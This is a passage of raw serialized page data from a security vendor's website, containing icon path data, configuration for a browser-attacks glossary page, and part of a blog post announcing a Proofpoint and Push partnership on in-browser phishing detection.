26.5-21.5 48-48 48l-96 0c-26.5 0-48-21.5-48-48l0-96zM320 96l0 64 64 0 0-64-64 0zM304 32l96 0c26.5 0 48 21.5 48 48l0 96c0 26.5-21.5 48-48 48l-96 0c-26.5 0-48-21.5-48-48l0-96c0-26.5 21.5-48 48-48zM288 352a32 32 0 1 1 0-64 32 32 0 1 1 0 64zm0 64c17.7 0 32 14.3 32 32s-14.3 32-32 32-32-14.3-32-32 14.3-32 32-32zm96 32c0-17.7 14.3-32 32-32s32 14.3 32 32-14.3 32-32 32-32-14.3-32-32zm32-96a32 32 0 1 1 0-64 32 32 0 1 1 0 64zm-32 32a32 32 0 1 1 -64 0 32 32 0 1 1 64 0z",{"w":380,"h":380,"d":403},"M257.5 27.6c-.8-5.4-4.9-9.8-10.3-10.6-22.1-3.1-44.6 .9-64.4 11.4l-74 39.5C89.1 78.4 73.2 94.9 63.4 115L26.7 190.6c-9.8 20.1-13 42.9-9.1 64.9l14.5 82.8c3.9 22.1 14.6 42.3 30.7 57.9l60.3 58.4c16.1 15.6 36.6 25.6 58.7 28.7l83 11.7c22.1 3.1 44.6-.9 64.4-11.4l74-39.5c19.7-10.5 35.6-27 45.4-47.2l36.7-75.5c9.8-20.1 13-42.9 9.1-64.9-.9-5.3-5.3-9.3-10.6-10.1-51.5-8.2-92.8-47.1-104.5-97.4-1.8-7.6-8-13.4-15.7-14.6-54.6-8.7-97.7-52-106.2-106.8zM208 144a32 32 0 1 1 0 64 32 32 0 1 1 0-64zM144 336a32 32 0 1 1 64 0 32 32 0 1 1 -64 0zm224-64a32 32 0 1 1 0 64 32 32 0 1 1 0-64z",{"w":379,"h":380,"d":405},"M144-16l-48 112-48 0 0 48 48 0 0 32c0 17 3.3 33.2 9.3 48l-73.3 0 0 32 5.3 16 26.7 80-64 160 51.7 0 56.9-142.2 6.5-16.3c-1-3.1-10.1-30.3-27.2-81.5l51.4 0c22.6 19.9 52.2 32 84.7 32s62.1-12.1 84.7-32l51.4 0c-17.1 51.2-26.1 78.4-27.2 81.5l6.5 16.3 56.9 142.2 51.7 0-64-160 26.7-80 5.3-16 0-32-73.3 0c6-14.8 9.3-31 9.3-48l0-32 48 0 0-48-48 0-48-112-32 0-48 32-48-32-32 0zm80 272c-32.8 0-61-19.7-73.3-48l57.3 0 16-40 16 40 57.3 0c-12.3 28.3-40.5 48-73.3 48zm17.5 139.6l30.5-35.6 0-24-96 0 0 24 30.5 35.6-46.5 116.4 128 0-46.5-116.4z",{"w":380,"h":380,"d":407},"M497.4 49l17-17-33.9-33.9C473.6 4.9 453.3 25.2 419.7 58.8 375.4 22.1 318.5 0 256.4 0 115.1 0 .4 114.6 .4 256s114.6 256 256 256 256-114.6 256-256l-48 0c0 114.9-93.1 208-208 208s-208-93.1-208-208 93.1-208 208-208c48.8 0 93.7 16.8 129.1 44.9l-45.7 45.7c-23.5-16.8-52.3-26.6-83.4-26.6-79.5 0-144 64.5-144 144s64.5 144 144 144 144-64.5 144-144l-48 0c0 53-43 96-96 96s-96-43-96-96 43-96 96-96c17.8 0 34.5 4.8 48.8 13.3-52 52-79.5 79.5-82.7 82.7l33.9 33.9 17-17 224-224z",{"w":380,"h":380,"d":409},"M208 0l24 0C386.6 0 512 125.4 512 280l0 24-48 0 0-24C464 151.9 360.1 48 232 48l-24 0 0-48zm24 96c101.6 0 184 82.4 184 184l0 24-48 0 0-24c0-75.1-60.9-136-136-136l-24 0 0-48 24 0zM48 256c0 114.9 93.1 208 208 208 22.9 0 45-3.7 65.6-10.5l-263-263C51.7 211 48 233.1 48 256zM0 256c0-36.5 7.6-71.3 21.4-102.7 6.7-15.3 14.9-29.9 24.4-43.5 7.7 7.7 61.5 61.5 161.2 161.2 30.5-30.5 49.5-49.5 57-57L297.9 248c-7.5 7.5-26.5 26.5-57 57 99.7 99.7 153.5 153.5 161.2 161.2-13.6 9.5-28.2 17.7-43.5 24.4-31.4 13.8-66.2 21.4-102.7 21.4-141.4 0-256-114.6-256-256z",{"w":380,"h":380,"d":411},"M267.6 4.5l207.5 80.5 19.2 7.4 1.2 20.5c2.9 50-4.9 126.3-37.3 200.9-32.7 75.2-91.1 150-189.4 192.5l-12.7 5.5-12.7-5.5C144.9 463.9 86.6 389.2 53.9 313.9 21.5 239.3 13.7 162.9 16.6 113L17.8 92.5 37 85 244.5 4.5 256 0 267.6 4.5zM64.1 126C63.1 169.5 71 232.9 97.9 294.8 126.1 359.7 175 422.4 256 459.6 337.1 422.4 385.9 359.7 414.2 294.8 441 232.9 449 169.5 448 126L256 51.5 64.1 126zm302.3 44.7L352.3 190.1 249.8 330.9 233 354c-8.8-9.1-30.9-32-66.2-68.6l-16.7-17.3 34.5-33.3c9.5 9.8 23.9 24.7 43.2 44.7l85.6-117.7 14.1-19.4 38.8 28.2z",{"w":380,"h":380,"d":413},"M192 48l40 0 0 108-12.4 0c-7.6-16.5-24.3-28-43.6-28-26.5 0-48 21.5-48 48s21.5 48 48 48c19.4 0 36.1-11.5 43.6-28l12.4 0 0 56-92 0 0 56.4c-16.5 7.6-28 24.3-28 43.6 0 26.5 21.5 48 48 48s48-21.5 48-48c0-19.4-11.5-36.1-28-43.6l0-16.4 52 0 0 172-40 0c-16.8 0-31.2-10.3-37.1-25.1l-6.4-16-17.2 1c-1.1 .1-2.2 .1-3.2 .1-30.9 0-56-25.1-56-56 0-9.5 2.4-18.5 6.5-26.3l8.7-16.2-13.4-12.6c-11-10.2-17.8-24.8-17.8-40.9 0-21.6 12.2-40.4 30.3-49.8l22.6-11.7-13.1-21.9c-5-8.4-7.9-18.1-7.9-28.6 0-30.9 25.1-56 56-56l24 0 0-32c0-13.3 10.7-24 24-24zm88 148l12.4 0c7.6 16.5 24.3 28 43.6 28 26.5 0 48-21.5 48-48s-21.5-48-48-48c-19.4 0-36.1 11.5-43.6 28l-12.4 0 0-108 40 0c13.3 0 24 10.7 24 24l0 32 24 0c30.9 0 56 25.1 56 56 0 10.5-2.9 20.3-7.9 28.6l-13.1 21.9 22.6 11.7c18 9.3 30.3 28.1 30.3 49.8 0 16.1-6.8 30.7-17.8 40.9l-13.4 12.6 8.7 16.2c4.2 7.8 6.5 16.7 6.5 26.3 0 30.9-25.1 56-56 56-1.1 0-2.2 0-3.2-.1l-17.2-1-6.4 16C351.2 453.7 336.8 464 320 464l-40 0 0-76 92 0 0-56.4c16.5-7.6 28-24.3 28-43.6 0-26.5-21.5-48-48-48s-48 21.5-48 48c0 19.4 11.5 36.1 28 43.6l0 16.4-52 0 0-152zM192 512l128 0c31.1 0 58.4-16.2 74.1-40.5 52.7-5.1 93.9-49.5 93.9-103.5 0-11.5-1.9-22.5-5.3-32.9 13.4-17.5 21.3-39.4 21.3-63.1 0-32-14.5-60.6-37.1-79.7 3.3-10.2 5.1-21.1 5.1-32.3 0-49.6-34.8-91.1-81.3-101.5-6.3-33.3-35.6-58.5-70.7-58.5L192 0c-35.1 0-64.4 25.2-70.7 58.5-46.5 10.4-81.3 51.9-81.3 101.5 0 11.3 1.8 22.2 5.1 32.3-22.7 19.1-37.1 47.7-37.1 79.7 0 23.7 8 45.6 21.3 63.1-3.5 10.4-5.3 21.4-5.3 32.9 0 54 41.2 98.5 93.9 103.5 15.6 24.3 42.9 40.5 74.1 40.5zM336 192a16 16 0 1 1 0-32 16 16 0 1 1 0 32zm32 96a16 16 0 1 1 -32 0 16 16 0 1 1 32 0zM176 352a16 16 0 1 1 -32 0 16 16 0 1 1 32 0zm16-176a16 16 0 1 1 -32 0 16 16 0 1 1 32 0z",{"w":398,"h":380,"d":415},"M16 64C16 28.7 44.7 0 80 0L304 0c35.3 0 64 28.7 64 64l0 384c0 35.3-28.7 64-64 64L80 512c-35.3 0-64-28.7-64-64L16 64zm64 0l0 304 224 0 0-304-224 0zM192 472c17.7 0 32-14.3 32-32s-14.3-32-32-32-32 14.3-32 32 14.3 32 32 32z",{"w":380,"h":380,"d":417},"M0 256c0-46.6 12.5-90.4 34.3-128.9L144.1 318.3c21.9 39.2 63.8 65.7 111.9 65.7 14.3 0 27.1-2.3 40.8-6.6L220.5 509.6C95.9 492.3 0 385.3 0 256zm365.1 65.6c12.3-19.2 18.9-42.5 18.9-65.6 0-38.2-16.8-72.5-43.3-96l152.7 0c12 29.6 18.6 62.1 18.6 96 0 141.4-114.6 255.1-256 256L365.1 321.6zM477.8 128L256 128c-62.9 0-113.7 44.1-125.5 102.7L54.2 98.5C101 38.5 174 0 256 0 350.8 0 433.5 51.5 477.8 128zM344 256a88 88 0 1 1 -176 0 88 88 0 1 1 176 0z",{"w":380,"h":380,"d":419},"M448 96l0 256-384 0 0-256 384 0zM64 32C28.7 32 0 60.7 0 96L0 352c0 35.3 28.7 64 64 64l144 0-16 48-72 0c-13.3 0-24 10.7-24 24s10.7 24 24 24l272 0c13.3 0 24-10.7 24-24s-10.7-24-24-24l-72 0-16-48 144 0c35.3 0 64-28.7 64-64l0-256c0-35.3-28.7-64-64-64L64 32z",{"w":380,"h":380,"d":421},"M32 64C19.1 64 7.4 71.8 2.4 83.8S.2 109.5 9.4 118.6L192 301.3 192 416c0 8.5 3.4 16.6 9.4 22.6l64 64c9.2 9.2 22.9 11.9 34.9 6.9S320 492.9 320 480l0-178.7 182.6-182.6c9.2-9.2 11.9-22.9 6.9-34.9S492.9 64 480 64L32 64z",{"w":395,"h":380,"d":423},"M144 480c-79.5 0-144-64.5-144-144 0-63.4 41-117.2 97.9-136.5-1.3-7.7-1.9-15.5-1.9-23.5 0-79.5 64.5-144 144-144 55.4 0 103.5 31.3 127.6 77.1 14.2-8.3 30.8-13.1 48.4-13.1 53 0 96 43 96 96 0 15.7-3.8 30.6-10.5 43.7 44 20.3 74.5 64.7 74.5 116.3 0 70.7-57.3 128-128 128l-304 0zM305 191c-9.4-9.4-24.6-9.4-33.9 0l-72 72c-9.4 9.4-9.4 24.6 0 33.9s24.6 9.4 33.9 0l31-31 0 102.1c0 13.3 10.7 24 24 24s24-10.7 24-24l0-102.1 31 31c9.4 9.4 24.6 9.4 33.9 0s9.4-24.6 0-33.9l-72-72z",{"createdBy":32,"createdDate":425,"data":426,"folders":661,"id":662,"lastUpdateSource":60,"lastUpdated":663,"lastUpdatedBy":478,"meta":664,"modelId":668,"name":430,"published":13,"query":669,"stageModifiedSincePublish":6,"testRatio":31,"variations":674,"firstPublished":675,"rev":676},1789646465509,{"ogImage":427,"seoDescription":428,"seoTitle":429,"themeId":6,"title":430,"blocks":431,"url":657,"state":658},"https:\u002F\u002Fcdn.builder.io\u002Fapi\u002Fv1\u002Fimage\u002Fassets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F9a32c96970a84f3f93be25d00f275a94","A glossary of browser-based attacks: what they are, how they work, and why legacy controls miss them.","Browser attacks glossary","browser-attack-glossary",[432,440,625,643,652],{"@type":44,"@version":45,"id":433,"component":434,"responsiveStyles":438},"builder-d938eff6b1bf4a8ea41a02cc61d8d373",{"name":435,"tag":435,"options":436,"isRSC":60},"BrowserAttacksGlossaryHero",{"title":429,"description":437},"\u003Cp class=\"\">Today's attacks target your users where modern work happens — in the browser. This glossary breaks down what they are, how they work, and why legacy controls miss them.\u003C\u002Fp>",{"large":439},{"display":63,"flexDirection":64,"position":65,"flexShrink":66,"boxSizing":67},{"@type":44,"@version":45,"id":441,"component":442,"responsiveStyles":623},"builder-edc4239f84f341b29ff54d0986452d80",{"name":443,"tag":443,"options":444,"isRSC":60},"BrowserAttacksGlossaryIntroduction",{"title":445,"description":446,"tagsIntro":447,"attacks":448},"What are browser attacks?","\u003Cp>\u003Cspan style=\"font-size: 16px;\">Browser attacks are attacks that play out inside the browser — the place employees now do most of their work. Instead of exploiting endpoints or networks, attackers go after the logins, sessions, and app integrations that connect your workforce to hundreds of SaaS and cloud services.\u003C\u002Fspan>\u003C\u002Fp>\u003Cp>\u003Cspan style=\"font-size: 16px;\">The playbook has moved on from classic phishing. Kits proxy real login pages and steal session tokens after MFA checks are completed. Social engineering lures trick users into running bad code that installs fileless malware. Authorization phishing attacks bypass the login entirely (and even passkeys). Browser extensions siphon sensitive data and secrets.\u003C\u002Fspan>\u003C\u002Fp>\u003Cp>\u003Cspan style=\"font-size: 16px;\">Security teams today need a plan to deal with browser attacks. The first step is to know your enemy.\u003C\u002Fspan>\u003C\u002Fp>\u003Cp>\u003Cbr>\u003C\u002Fp>","Click below to go deeper into the most prevalent attack techniques, or browse the glossary for the big picture.",[449,466,483,497,511,525,539,553,567,581,595,609],{"attack":450},{"@type":105,"id":451,"model":452,"value":453},"cd584516fc65418db151c21c784c90ad","browser-attacks-glossary-attack",{"createdDate":454,"id":451,"name":455,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":457,"data":458,"variations":459,"lastUpdated":460,"firstPublished":461,"testRatio":31,"createdBy":32,"lastUpdatedBy":32,"folders":462,"lastUpdateSource":60,"meta":463,"rev":465},1790168609077,"Adversary-in-the-Middle (AiTM)","e8f17fa90c3d4213ba772da0f6506ffc",[],{"name":455,"url":252},{},1790168642060,1790168642045,[],{"breakpoints":464,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},"3y2wd2ibpz8",{"attack":467},{"@type":105,"id":468,"model":452,"value":469},"866b53c02b0a448fa424e39d0337db8d",{"createdDate":470,"id":468,"name":471,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":472,"data":473,"variations":475,"lastUpdated":476,"firstPublished":477,"testRatio":31,"createdBy":32,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":479,"meta":480,"rev":482},1790171567190,"ClickFix (+Fix variants) ",[],{"name":474,"url":257},"ClickFix (+Fix variants)",{},1790175196308,1790171597916,"SfUPqW5tkibIPby49keNFMdHFTr1",[],{"lastPreviewUrl":21,"kind":20,"breakpoints":481,"hasErrors":6,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},"lvkhw75f50j",{"attack":484},{"@type":105,"id":485,"model":452,"value":486},"93f8d02ea6ab406fa1c5f70c90f001d5",{"createdDate":487,"id":485,"name":265,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":488,"data":489,"variations":490,"lastUpdated":491,"firstPublished":492,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":493,"meta":494,"rev":496},1790174488748,[],{"name":265,"url":267},{},1790174500936,1790174500933,[],{"breakpoints":495,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},"g9byiwk5ux",{"attack":498},{"@type":105,"id":499,"model":452,"value":500},"efe3387a0752443987e2cef6e17245d5",{"createdDate":501,"id":499,"name":299,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":502,"data":503,"variations":504,"lastUpdated":505,"firstPublished":506,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":507,"meta":508,"rev":510},1790174669783,[],{"name":299,"url":301},{},1790174683124,1790174683116,[],{"breakpoints":509,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},"yjrii09cpl",{"attack":512},{"@type":105,"id":513,"model":452,"value":514},"449c7fe0523249ad9aa2c8a6498c6570",{"createdDate":515,"id":513,"name":260,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":516,"data":517,"variations":518,"lastUpdated":519,"firstPublished":520,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":521,"meta":522,"rev":524},1790174549282,[],{"name":260,"url":262},{},1790174561943,1790174561934,[],{"breakpoints":523,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},"zml64nwlwh",{"attack":526},{"@type":105,"id":527,"model":452,"value":528},"8283c2fb9d6a41ccad7e1c3ca4b3ed23",{"createdDate":529,"id":527,"name":289,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":530,"data":531,"variations":532,"lastUpdated":533,"firstPublished":534,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":535,"meta":536,"rev":538},1790174695510,[],{"name":289,"url":291},{},1790174717351,1790174717340,[],{"breakpoints":537,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},"zo62fyjm4d",{"attack":540},{"@type":105,"id":541,"model":452,"value":542},"2a4ada2f337645fab8d509f54b5e0117",{"createdDate":543,"id":541,"name":285,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":544,"data":545,"variations":546,"lastUpdated":547,"firstPublished":548,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":549,"meta":550,"rev":552},1790174639955,[],{"name":285,"url":287},{},1790174654053,1790174654040,[],{"breakpoints":551,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},"qlgufdf6hol",{"attack":554},{"@type":105,"id":555,"model":452,"value":556},"ad7eaabac1834b9994bedd5624f6a190",{"createdDate":557,"id":555,"name":275,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":558,"data":559,"variations":560,"lastUpdated":561,"firstPublished":562,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":563,"meta":564,"rev":566},1790174423016,[],{"name":275,"url":277},{},1790174442586,1790174442575,[],{"breakpoints":565,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},"d2ijsdy3t0n",{"attack":568},{"@type":105,"id":569,"model":452,"value":570},"ef33d88ee6a145c79d1e73f07f2b1828",{"createdDate":571,"id":569,"name":280,"modelId":456,"published":13,"meta":572,"stageModifiedSincePublish":6,"query":574,"data":575,"variations":576,"lastUpdated":577,"firstPublished":578,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":579,"rev":580},1790174381019,{"breakpoints":573,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},[],{"name":280,"url":282},{},1790174407329,1790174407318,[],"56p48lr89ls",{"attack":582},{"@type":105,"id":583,"model":452,"value":584},"14ab0591c9834275a4b5f612873c52c1",{"createdDate":585,"id":583,"name":270,"modelId":456,"published":13,"meta":586,"stageModifiedSincePublish":6,"query":588,"data":589,"variations":590,"lastUpdated":591,"firstPublished":592,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":593,"rev":594},1790174603970,{"breakpoints":587,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},[],{"name":270,"url":272},{},1790174618301,1790174618298,[],"j9v5trsanil",{"attack":596},{"@type":105,"id":597,"model":452,"value":598},"711df8b88f3d4abeb6a8f6d793bcda9a",{"createdDate":599,"id":597,"name":294,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":600,"data":601,"variations":602,"lastUpdated":603,"firstPublished":604,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":605,"meta":606,"rev":608},1790174791370,[],{"name":294,"url":296},{},1790174808115,1790174808105,[],{"breakpoints":607,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},"34aq21rz30a",{"attack":610},{"@type":105,"id":611,"model":452,"value":612},"da178536d88e496d8279c0845e501069",{"createdDate":613,"id":611,"name":245,"modelId":456,"published":13,"stageModifiedSincePublish":6,"query":614,"data":615,"variations":616,"lastUpdated":617,"firstPublished":618,"testRatio":31,"createdBy":478,"lastUpdatedBy":478,"lastUpdateSource":60,"folders":619,"meta":620,"rev":622},1790174456926,[],{"name":245,"url":247},{},1790174470194,1790174470183,[],{"breakpoints":621,"kind":20,"hasErrors":6,"lastPreviewUrl":21,"hasAutosaves":6},{"xsmall":18,"small":17,"medium":16},"lxcarjsklq",{"large":624},{"display":63,"flexDirection":64,"position":65,"flexShrink":66,"boxSizing":67},{"@type":44,"@version":45,"id":626,"component":627,"responsiveStyles":641},"builder-ea5067d567754716b676e677b2a1e25b",{"name":628,"tag":628,"options":629,"isRSC":60},"BrowserAttacksGlossaryEntries",{"cards":630},[631,636],{"buttonText":632,"title":633,"description":634,"url":635},"Read the report","2026 Browser Attack Report","The year's attack data from millions of employee browsers.","\u002Fresources\u002Fbrowser-attacks",{"buttonText":637,"title":638,"description":639,"url":640},"Explore the matrix","Browser Attacks Matrix","Every attacker technique in the browser and identity layer, mapped","\u002Fresources\u002Fbrowser-identity-attacks-matrix",{"large":642},{"display":63,"flexDirection":64,"position":65,"flexShrink":66,"boxSizing":67},{"@type":44,"@version":45,"id":644,"component":645,"responsiveStyles":650},"builder-84a7568d1610448c991d1f0814b2b6fc",{"name":646,"tag":646,"options":647,"isRSC":60},"LatestResources",{"sectionHeading":648,"customClass":21,"backgroundColour":649},"Latest resources","black",{"large":651},{"display":63,"flexDirection":64,"position":65,"flexShrink":66,"boxSizing":67},{"id":653,"@type":44,"tagName":73,"properties":654,"responsiveStyles":655},"builder-pixel-blhiqn63ank",{"src":75,"aria-hidden":76,"alt":21,"width":66,"height":66},{"large":656},{"height":66,"width":66,"display":79,"opacity":66,"overflow":80,"pointerEvents":81},"\u002Fresources\u002Fbrowser-attacks-glossary",{"deviceSize":83,"location":659},{"path":21,"query":660},{},[],"b399f044a15d49b0a87eb808f17b1b2f",1790353967846,{"breakpoints":665,"hasAutosaves":6,"hasErrors":6,"hasLinks":6,"kind":666,"lastPreviewUrl":667},{"medium":16,"small":17,"xsmall":18},"page","http:\u002F\u002Flocalhost:8081\u002Fresources\u002Fbrowser-attacks-glossary?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests%2CmergePullRequests%2CfusionHostingPublish%2CfusionHostingRevokeAiToken&builder.user.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=browser-attack-glossary&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.browser-attack-glossary=b399f044a15d49b0a87eb808f17b1b2f&builder.overrides.b399f044a15d49b0a87eb808f17b1b2f=b399f044a15d49b0a87eb808f17b1b2f&builder.options.locale=Default","98f3ab7c38d940f39cd320b950c67ece",[670],{"@type":671,"operator":672,"property":673,"value":657},"@builder.io\u002Fcore:Query","is","urlPath",{},1789650801113,"v452nwv8col",[678,3715,7855,11519],{"id":679,"title":680,"authorsCollection":681,"content":689,"extension":942,"faqItemsCollection":943,"faqTitle":60,"featured":19,"hashTags":60,"meta":945,"metaTitle":946,"ogImage":60,"postType":947,"publishedDate":948,"relatedBlogPostsCollection":949,"slug":3652,"stem":3653,"subtitle":60,"summary":3654,"synopsis":3665,"sys":3666,"tagsCollection":3669,"topicsCollection":3675,"__hash__":3714},"blog\u002Fblog\u002Fproofpoint-x-push-partnership-announcement.json","Proofpoint x Push: Why browser security is now a non-negotiable for security teams",{"items":682},[683],{"fullName":684,"firstName":685,"jobTitle":686,"socialLinks":60,"profilePicture":687},"Adam Bateman","Adam","Co-founder \u002F CEO",{"url":688},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F3Bt9feB72kxdWlS0hvpldi\u002F904bdb8b20d98e53c574f8be2f60996b\u002FPush_Founders_at_Cahoots_October_28_2022_by_Doug_Coombe-20.jpg",{"json":690,"links":937},{"nodeType":691,"data":692,"content":693},"document",{},[694,713,720,724,733,740,747,754,761,768,777,784,805,813,820,827,834,837,845,852,859,866,873,881,888,895,902,905,912,919],{"nodeType":695,"data":696,"content":697},"paragraph",{},[698,703,709],{"nodeType":699,"value":700,"marks":701,"data":702},"text","We're announcing a partnership with Proofpoint to power ",[],{},{"nodeType":699,"value":704,"marks":705,"data":708},"Proofpoint Advanced Browser Protection ",[706],{"type":707},"bold",{},{"nodeType":699,"value":710,"marks":711,"data":712},"— a new addition to Proofpoint's collaboration security platform that extends protection from the inbox into the browser session. Push provides the real-time behavioral detection, in-session blocking, and browser telemetry that feeds directly into Proofpoint's Threat Protection Workbench, Security Graph, and Investigation Agent.",[],{},{"nodeType":695,"data":714,"content":715},{},[716],{"nodeType":699,"value":717,"marks":718,"data":719},"Proofpoint is one of the biggest names in cybersecurity. They've spent two decades building the most comprehensive picture of how attacks reach people via email. This partnership exists because Proofpoint recognizes that today’s attacks don’t stop at the inbox: they happen inside the browser session. ",[],{},{"nodeType":721,"data":722,"content":723},"hr",{},[],{"nodeType":725,"data":726,"content":727},"heading-1",{},[728],{"nodeType":699,"value":729,"marks":730,"data":732},"Phishing doesn't stop at the inbox anymore",[731],{"type":707},{},{"nodeType":695,"data":734,"content":735},{},[736],{"nodeType":699,"value":737,"marks":738,"data":739},"Email is one of the most heavily defended delivery channels in the enterprise. Enterprise organizations have multiple layers of email security, scanning messages for malicious links, sandboxing attachments, and rewriting URLs. ",[],{},{"nodeType":695,"data":741,"content":742},{},[743],{"nodeType":699,"value":744,"marks":745,"data":746},"But better controls doesn't mean attackers stopped phishing: they adapted.",[],{},{"nodeType":695,"data":748,"content":749},{},[750],{"nodeType":699,"value":751,"marks":752,"data":753},"Push data shows a growing number of malicious payloads now arrive outside of email entirely — via messaging apps, social media, search results, and malvertising.",[],{},{"nodeType":695,"data":755,"content":756},{},[757],{"nodeType":699,"value":758,"marks":759,"data":760},"As email defenses improve, attackers increasingly conceal malicious content during delivery, such as multi-stage redirect chains and conditional loading based on email, IP and browser checks that prevent the true destination from being revealed until a user interacts with the link. These techniques allow links to appear legitimate during email inspection while exposing malicious content only at the point of interaction, making the browser a critical control point for detecting and stopping modern attacks.",[],{},{"nodeType":695,"data":762,"content":763},{},[764],{"nodeType":699,"value":765,"marks":766,"data":767},"All of this makes it increasingly difficult for traditional time-of-click URL and page analysis to find and block bad before a user has the chance to get phished. ",[],{},{"nodeType":769,"data":770,"content":771},"heading-2",{},[772],{"nodeType":699,"value":773,"marks":774,"data":776},"No matter the delivery vector, the attack plays out in the browser ",[775],{"type":707},{},{"nodeType":695,"data":778,"content":779},{},[780],{"nodeType":699,"value":781,"marks":782,"data":783},"Either way, the attack ends up rendering in the browser session, where the user enters credentials and completes MFA checks, authorizes an OAuth consent grant, copies a malicious command, downloads a file, or installs a malicious extension. That's the moment that determines whether the attack succeeds or fails.",[],{},{"nodeType":695,"data":785,"content":786},{},[787,790,801],{"nodeType":699,"value":21,"marks":788,"data":789},[],{},{"nodeType":791,"data":792,"content":794},"hyperlink",{"uri":793},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002F7-things-omdias-latest-report-tells-us-about-the-secure-enterprise-browser-market",[795],{"nodeType":699,"value":796,"marks":797,"data":800},"Omdia's Browser Management and Security ",[798],{"type":799},"underline",{},{"nodeType":699,"value":802,"marks":803,"data":804},"report puts a number on the consequence: 49% of organizations suffered a confirmed successful browser-based attack in the preceding 12 months, and 88% now rank browser security among their top 5 priorities.",[],{},{"nodeType":725,"data":806,"content":807},{},[808],{"nodeType":699,"value":809,"marks":810,"data":812},"Known-bad blocklists can’t keep up: Real-time behavioral analysis in the browser is the answer",[811],{"type":707},{},{"nodeType":695,"data":814,"content":815},{},[816],{"nodeType":699,"value":817,"marks":818,"data":819},"89% of phishing domains are active for less than two days. Phishing kits rotate infrastructure continuously. Attackers host phishing content on trusted cloud platforms — Azure Blob Storage, Cloudflare Workers, Google-owned domains, and many more — that carry clean reputations by default. A URL that returns \"safe\" at time of delivery tells you very little about what the page will do when the user clicks through an hour later.",[],{},{"nodeType":695,"data":821,"content":822},{},[823],{"nodeType":699,"value":824,"marks":825,"data":826},"Push detects attacks by analyzing what the page actually does. Because we operate inside the browser session, we see the page load in real time and how the user interacts with it, including all of the client-side scripting and DOM loading that happens with modern web pages (and is invisible at the network layer). This means we can spot attacks by technique and behavior rather than just looking at things like domains, URLs, or static HTML.",[],{},{"nodeType":695,"data":828,"content":829},{},[830],{"nodeType":699,"value":831,"marks":832,"data":833},"AiTM kits, cloned login pages, Browser-in-the-Browser pop-ups, the ClickFix family of malicious copy-and-paste attacks, device code phishing, malicious OAuth consent grants — our behavioral detection catches them all, regardless of the infrastructure, hosting, or phish kits used. ",[],{},{"nodeType":721,"data":835,"content":836},{},[],{"nodeType":725,"data":838,"content":839},{},[840],{"nodeType":699,"value":841,"marks":842,"data":844},"What Push brings to Advanced Browser Protection",[843],{"type":707},{},{"nodeType":695,"data":846,"content":847},{},[848],{"nodeType":699,"value":849,"marks":850,"data":851},"Push detects and blocks attacks regardless of whether a phishing link arrived via email, social media DM,  a Teams message, a Google search ad, or a compromised website. The delivery channel is irrelevant to Push's detection model — which is the point. ",[],{},{"nodeType":695,"data":853,"content":854},{},[855],{"nodeType":699,"value":856,"marks":857,"data":858},"With Push, no matter where a link is clicked and a page is loaded from, malicious content is detected and blocked in real time, before the user is compromised. Even if a page has never been flagged before, Push analyzes, detects the malicious elements of the page, and blocks access before the user has time to interact with it. Every session and interaction is protected by Push, without any need for sandboxing or latency-inducing remote isolation technology. ",[],{},{"nodeType":695,"data":860,"content":861},{},[862],{"nodeType":699,"value":863,"marks":864,"data":865},"Push's browser telemetry — every page load, credential entry, session event, and OAuth consent — feeds directly into Proofpoint's Threat Protection Workbench and Investigation Agent, giving security teams a unified view from the message that carried the lure through to the credential entered and the session compromised. 